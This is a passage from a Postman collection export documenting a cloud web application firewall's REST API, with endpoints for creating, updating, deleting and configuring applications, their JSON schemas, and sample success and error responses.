\"all\": [\"ca-central-1\", \"us-east-1\", \"eu-west-2\", \"us-west-1\", \"sa-east-1\", \"ap-south-1\", \"us-east-2\", \"ap-southeast-1.prod\", \"us-west-2\", \"eu-west-1\", \"eu-central-1\", \"eu-south-1\", \"eu-west-3\", \"ap-southeast-2\"], \n        \"platform\": \"Amazon Web Service\", \"plat\": \"AWS\", \n        \"continent\": \"NA\", \n        \"continent_regions\": [\"us-east-1\", \"us-east-2\", \"us-west-1\", \"us-west-2\", \"ca-central-1\", \"sa-east-1\"]\n    }\n}"},{"id":"3772a231-6674-4dcd-b5c1-a126d8f3e84e","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"ep_ip\": \"\",\n\t\"domain_name\":\"\",\n\t\"extra_domains\":[]\n}"},"url":"https://api.tim.waasonline.com/v1/misc/check-ip-region"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 10 Jun 2019 02:15:01 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"50"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"8d271466-8b25-11e9-8ef6-856db19ad424"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bCp9xEqEoAMFh9g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cfdbd24-fdc71d5efa0ea9fc1efe16eb;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"reason\": \"No endpoint IP found in POST message\"\n}"}],"_postman_id":"d13e462b-45ac-4e66-b280-8e71287ad821"},{"name":"Create Application","id":"ef4db96d-15c3-49ff-ba7b-95b4480ea35a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n\t\"app_name\": \"wl_us1\",\r\n\t\"domain_name\": \"www.example.com\",\r\n\t\"extra_domains\": [\"a.example.com\", \"b.example.com\"],\r\n\t\"custom_port\":{\r\n\t\t\"http\":80,\r\n\t\t\"https\":443\r\n\t},\r\n\t\"cdn_status\": 0,\r\n\t\"region\": \"us-east-1\",\r\n\t\"platform\": \"AWS\",\r\n\t\"block_mode\": 0,\r\n\t\"service\": [\"http\", \"https\"],\r\n\t\"server_address\": \"93.184.216.34\",\r\n\t\"server_type\": \"https\",\r\n\t\"server_country\": \"United States\",\r\n\t\"head_availability\": 1,\r\n\t\"head_status_code\": 404\r\n}"},"url":"https://api.tim.waasonline.com/v1/application","description":"<p>Create a new application.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"app_name\", \"cdn_status\", \"domain_name\", \"service\", \"server_address\", \"server_type\", \"block_mode\"],\n    \"properties\": {\n        \"app_name\": {\n            \"description\": \"Application name\",\n            \"type\": \"string\",\n            \"maxLength\": 64\n        },\n        \"region\": {\n            \"description\": \"Region name which should be specified when CDN is disabled\",\n            \"type\": \"string\",\n        },\n            \"cdn_status\": {\n            \"description\": \"0 - CDN is disabled; 1 - CDN is enabled\",\n            \"type\": \"number\",\n        },\n            \"platform\": {\n            \"description\": \"Platform which should be specified when CDN is enabled. If this is not specified, a default platform AWS will be chosen\",\n            \"type\": \"string\",\n        },\n            \"domain_name\": {\n            \"description\": \"The domain name you use to access your application\",\n            \"type\": \"string\"\n        },\n              \"extra_domains\": {\n            \"description\": \"Extra domains except domain_name\",\n            \"type\": \"array\",\n            \"items\": {\n            \"type\": \"string\"\n            }\n        },\n            \"service\": {\n            \"description\": \"The service allowed on your application\",\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"string\",\n                \"enum\": [\"http\", \"https\"]\n            }\n        },\n            \"server_address\": {\n            \"description\": \"The customized IP address/domain\",\n            \"type\": \"string\"\n        },\n            \"server_country\": {\n            \"description\": \"The country name where the server locates\",\n            \"type\": \"string\"\n        },\n            \"server_port\": {\n            \"description\": \"The customized port number\",\n            \"type\": \"number\",\n            \"minimum\": 1,\n            \"maximum\": 65535\n        },\n            \"server_type\": {\n            \"description\": \"The server protocol for the connection between TIM Host Protection and the origin server\",\n            \"type\": \"string\",\n            \"enum\": [\"http\", \"https\"]\n        },\n            \"template_id\": {\n            \"description\": \"The ID of the template which the application inherits\",\n            \"type\": \"string\",\n        },\n            \"block_mode\": {\n            \"description\": \"Select 0 to disable the block mode or select 1 to enable the block mode\",\n            \"type\": \"number\",\n            \"enum\": [0, 1]\n        },\n            \"head_availability\": {\n           \"description\": \"Select 0 to disable health check or select 1 to enable health check\",\n            \"type\": \"number\",\n            \"enum\": [0, 1]\n        },\n            \"head_status_code\": {\n            \"description\": \"When health check is enabled and the method is HEAD, configure the response code\",\n            \"type\": \"number\",\n            \"minimum\": 200,\n            \"maximum\": 499\n        },\n            \"assign_to\": {\n            \"description\": \"he user's user_id whom you want to assign this application to. Only MSSP users are allowed to use this. Default is current user_id\",\n            \"type\": \"string\",\n        },\n        \"continent\": {\n            \"description\": \"Continent name abbreviation\",\n            \"type\": \"string\",\n            \"enum\": [\"AF\",\"AN\",\"AS\",\"EU\",\"NA\",\"SA\",\"OC\"]\n        },\n        \"is_global_cdn\": {\n           \"description\": \"Set global CDN flag. Selecet 1 to enable global CDN and 0 to continet CDN when CDN flag is enbaled\",\n            \"type\": \"number\",\n            \"enum\": [0, 1]\n        },\n        \"custom_port\":{\n            \"type\": \"object\",\n            \"properties\":{\n                \"http\":{\n                    \"description\": \"Define the custom port of http service, default http port is 80\",\n                    \"type\":\"number\",\n                },\n                \"https\":{\n                    \"description\": \"Define the custom port of https service, default https ports is 443\",\n                    \"type\":\"number\",\n\n                }\n            }\n\n        }\n\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"5b7e6e2d-8f4e-40ce-a2dc-ff3d5928e186","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"app_name\": \"wl_us1\",\r\n\t\"domain_name\": \"www.example.com\",\r\n\t\"custom_port\":{\r\n\t\"http\":80,\r\n\t\"https\":443\r\n\t},\r\n\t\"cdn_status\": 0,\r\n\t\"region\": \"us-east-1\",\r\n\t\"platform\": \"AWS\",\r\n\t\"block_mode\": 0,\r\n\t\"service\": [\"http\", \"https\"],\r\n\t\"server_address\": \"93.184.216.34\",\r\n\t\"server_type\": \"https\",\r\n\t\"server_country\": \"United States\",\r\n\t\"head_availability\": 1,\r\n\t\"head_status_code\": 404\r\n}"},"url":"https://api.tim.waasonline.com/v1/application"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:47:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9a10ba1e-8694-11e9-a32a-1797b2394ff8"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avgO5HWXIAMFxzA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf613f8-bd6159ba500ab7df8764eee1;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"The application name already exists\"\n}"},{"id":"f90af37f-a431-456b-85ca-afb787e4ed12","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"app_name\": \"wl_us1\",\r\n\t\"domain_name\": \"www.example.com\",\r\n\t\"extra_domains\": [\"a.example.com\", \"b.example.com\"],\r\n\t\"custom_port\":{\r\n\t\"http\":80,\r\n\t\"https\":443\r\n\t},\r\n\t\"cdn_status\": 0,\r\n\t\"region\": \"us-east-1\",\r\n\t\"platform\": \"AWS\",\r\n\t\"block_mode\": 0,\r\n\t\"service\": [\"http\", \"https\"],\r\n\t\"server_address\": \"93.184.216.34\",\r\n\t\"server_type\": \"https\",\r\n\t\"server_country\": \"United States\",\r\n\t\"head_availability\": 1,\r\n\t\"head_status_code\": 404,\r\n    \"is_global_cdn\": 1,\r\n    \"continent\": \"NA\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/application"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:46:10 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"188"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"6d563a6d-8694-11e9-ab03-5132590cd719"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avgDLE_UoAMFnyA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf613ad-97b8a0acb1663f54401ddce9;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"domain_info\": [\n        {\n            \"domain\": \"test.com\",\n            \"registrar\": \"Network Solutions, LLC\",\n            \"record_value\": {\n                \"A\": [\n                    \"69.172.200.235\"\n                ],\n                \"CNAME\": []\n            },\n            \"dns\": \"test.00615.fortiwebcloud.net.\"\n        },\n        {\n            \"domain\": \"*.test.com\",\n            \"registrar\": \"\",\n            \"record_value\": {\n                \"A\": [],\n                \"CNAME\": []\n            },\n            \"dns\": \"test.00615.fortiwebcloud.net.\"\n        }\n    ],\n    \"acme_info\": [{\n        \"cname_name\": \"_acme-challenge.test.com\",\n        \"cname_value\": \"_acme-challenge.test.com.00615.fortiwebcloud.net.\"\n    }],\n    \"naked_domain_ips\": [\"1.1.1.1\", \"2.2.2.2\"]\n}"}],"_postman_id":"ef4db96d-15c3-49ff-ba7b-95b4480ea35a"},{"name":"Delete Application","id":"f2bd471a-497d-475b-a76a-b502ffaaed0d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id","description":"<p>Delete an application.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"type":"any","key":"ep_id"}]}},"response":[{"id":"2ebd2f40-7dae-4c09-87bd-2ab8f3fdb5fe","name":"Success","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"46"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"08c9346d-869a-11e9-bcbc-a75865823244"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avl7eEtqIAMFyiw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf61d16-d93528509ed795107cb428c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Application deleted successfully\"\n}"},{"id":"e1833943-6c4a-444d-a216-23c698b96ebe","name":"Fail","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"1fb9b362-869a-11e9-99a0-cb59002286b1"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avmBeFX8oAMF5Qg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"f2bd471a-497d-475b-a76a-b502ffaaed0d"},{"name":"Get Application Helper","id":"50cd9cad-fb0d-4197-bcc2-a0fdba73028b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id","description":"<p>Get some brief information of an application.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"44bec227-fd92-4178-b3ef-748603e2687b","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:22:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"8030ca57-8699-11e9-93e2-154242678da5"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avlXqFtYoAMF2vg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"d2b59c88-b43f-4115-895b-b1ecf63e7fd2","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:21:11 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"90"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5444962e-8699-11e9-abf8-bb341ee8a3ce"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avlMJHn3oAMF-Ig="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf61be7-9c2c4e602d1af800fc5165d0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"domain_name\": \"www.example.com\",\n    \"block_mode\": 0,\n    \"app_name\": \"wl_us1\",\n    \"fsa_status\": 1\n}"}],"_postman_id":"50cd9cad-fb0d-4197-bcc2-a0fdba73028b"},{"name":"Configure Block Mode","id":"13d9a49e-3633-4aa9-8f0d-a6b58457f99c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n\t\"block_mode\": 1\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/block","description":"<p>Enable/Disable the block mode.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"block_mode\": {\n            \"description\": \"Select 0 to disable the block mode, or select 1 to enable the block mode\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","block"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"03764ab4-89ac-4c75-9d2c-631560bd4b36","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"block_mode\": 1\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/block","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","block"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:53:40 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"de539e2b-869d-11e9-b544-7b0d96fa5930"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avp8xFU0IAMFVcg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"4702e092-1ff2-4f19-b71b-a16b3ad1db33","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"block_mode\": 1\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/block","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","block"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:53:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"52"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"ccdaf625-869d-11e9-9181-1b3e7d75288b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avp4MHnaoAMFpkA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf62367-5efa3244fd5a4b848d20f468;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Block Mode status changed successfully\"\n}"}],"_postman_id":"13d9a49e-3633-4aa9-8f0d-a6b58457f99c"},{"name":"Update Application","id":"e67d4aae-0cab-45ef-88b2-c22285064313","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"app_name\":\"test\",\n    \"cdn_status\":0,\n    \"region\":\"us-east-1\",\n    \"is_global_cdn\":0,\n    \"continent\":\"NA\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id","description":"<p>Update the application, including app_name, user alias, and CDN status.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"app_name\": {\n            \"description\": \"Application name\",\n            \"type\": \"string\",\n            \"maxLength\": 64\n        },\n        \"user_name\": {\n            \"description\": \"The actual name of this user\",\n            \"type\": \"string\"\n        },\n        \"alias_name\": {\n            \"description\": \"The user alias. It's default value is user_name\",\n            \"type\": \"string\",\n            \"maxLength\": 64\n        },\n        \"assign_to_user_name\": {\n            \"description\": \"The actual name of this user\",\n            \"type\": \"string\"\n        },\n        \"assign_to\": {\n            \"description\": \"The user alias. It's default value is user_name\",\n            \"type\": \"string\",\n            \"maxLength\": 64\n        },\n        \"cdn_status\": {\n            \"description\": \"CDN status. 0 - CDN is disabled; 1 - CDN is enabled\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"region\": {\n            \"description\": \"Region name which should be specified when CDN is disabled\",\n            \"type\": \"string\"\n        },\n        \"is_global_cdn\": {\n            \"description\": \"Global CDN status. 0 -  CDN is continent; 1 - CDN is global\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"continent\": {\n            \"description\": \"Continent name which should be specified when CDN is enbaled and is_global_cdn is 0\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"90c5bc1c-c393-4eb6-846e-c40efe2b80f4","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"app_name\":\"test\",\n    \"cdn_status\":0,\n    \"region\":\"us-east-1\",\n    \"is_global_cdn\":0,\n    \"continent\":\"NA\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:53:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"52"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"ccdaf625-869d-11e9-9181-1b3e7d75288b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avp4MHnaoAMFpkA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf62367-5efa3244fd5a4b848d20f468;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Application updated\"\n}"},{"id":"9fb68672-a091-448e-9867-33a607f6bc35","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"app_name\":\"test\",\n    \"cdn_status\":0,\n    \"region\":\"us-east-1\",\n    \"is_global_cdn\":0,\n    \"continent\":\"NA\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:53:40 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"de539e2b-869d-11e9-b544-7b0d96fa5930"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avp8xFU0IAMFVcg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"e67d4aae-0cab-45ef-88b2-c22285064313"}],"id":"dbb41178-d47e-4bd8-891b-284ba2b356e8","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"876c5894-2bef-4f0b-b2cf-452f8bc8ab46"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"02dfad44-2a3f-4a9d-8bf4-0a7d5a074c1d"}}],"_postman_id":"dbb41178-d47e-4bd8-891b-284ba2b356e8","description":""},{"name":"Application Settings","item":[{"name":"Get Dashboard Logs","id":"25b7e91f-e9c7-4221-8654-093470eb9821","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard?category={{category}}&timespan={{timespan}}","description":"<p>Get the information of monthly statistics, throughput, and incoming requests on DASHBOARD tab.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","dashboard"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The values for this variable are [\"month_sum\", \"lic_info\", \"req\", \"tp\"], no default value.</p>\n<p>month_sum: \nReturn the monthly statistics of the endpoint, such as total throughput, total requests, total blocked requests, the user's subscribed bandwidth, and usage bandwidth, etc.</p>\n<p>lic_info:\nReturn user's license type and the expiration date.</p>\n<p>req:\nReturn allowed requests and blocked requests.</p>\n<p>hp:\nReturn the HTTPS throughput and HTTP throughput.</p>\n","type":"text/plain"},"key":"category","value":"{{category}}"},{"description":{"content":"<p>The values for this variable are [\"last_hour\", \"last_24_hours\", \"last_7_days\", \"last_14_days\"], no default value.</p>\n<p>The value is required only when {{categroy}} equals to \"tp\" or \"req\".</p>\n","type":"text/plain"},"key":"timespan","value":"{{timespan}}"}],"variable":[{"type":"any","key":"ep_id"}]}},"response":[{"id":"090f8055-cbec-42f4-8e7e-488c95b741ff","name":"DashboardLogs-last-7-days-throughput","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard?category=tp&timespan=last_7_days","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","dashboard"],"query":[{"key":"category","value":"tp"},{"key":"timespan","value":"last_7_days"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:01:36 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"720"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"39d8ab98-8bf5-11e9-af5b-3919993cfc1a"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGDulGECSQ0Fegw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff1990-8d94f7015d23d76c9c7cad65;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"20190606T160000\": {\n        \"http_tp\": 0,\n        \"https_tp\": 0\n    },\n    \"20190606T170000\": {\n        \"http_tp\": 0,\n        \"https_tp\": 0\n    },\n    \"20190606T180000\": {\n        \"http_tp\": 0,\n        \"https_tp\": 0\n    }\n}"},{"id":"6d02053e-7629-4e70-a4e8-cc541d7675a7","name":"DashboardLogs-fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/dashboard?category=tp&timespan=last_38_days","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","dashboard"],"query":[{"key":"category","value":"tp"},{"key":"timespan","value":"last_38_days"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:16:15 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"131"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"45b4cac5-8bf7-11e9-bc77-bd14488131d2"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGF36F_EyQ0FdfQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff1cff-8a7ff7f87b8c54a01f1195ac;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"illegal request parameter: bad timespan: should be: last_hour, last_24_hours, last_7_days, 